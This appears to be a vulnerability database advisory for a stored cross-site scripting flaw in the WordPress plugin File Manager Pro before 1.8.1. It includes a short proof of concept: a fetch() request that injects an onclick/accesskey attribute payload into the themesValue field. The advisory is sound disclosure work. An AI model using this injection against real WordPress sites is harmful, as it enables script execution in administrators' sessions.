WordPress Plugin Vulnerabilities
File Manager Pro < 1.8.1 - Admin+ Stored Cross-Site Scripting
Description
The plugin does not adequately validate and escape some inputs, leading to XSS by high-privilege users.
Proof of Concept
As an admin, open the File Manager and run the following JS code: fetch("http://localhost:10008/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded; charset=UTF-8", }, "body": "action=selector_themes&themesValue=dark-slim\"+accesskey=X+onclick=alert(/XSS/)+\"&nonce=" + wpData.nonce, "method": "POST", "mode": "cors", "credentials": "include" }); As a super-admin, open the File Manager and press the Access Key combination (Firefox for Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X) to trigger the XSS.
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-19 (about 7 months ago)
Added
2023-09-19 (about 7 months ago)
Last Updated
2023-09-19 (about 7 months ago)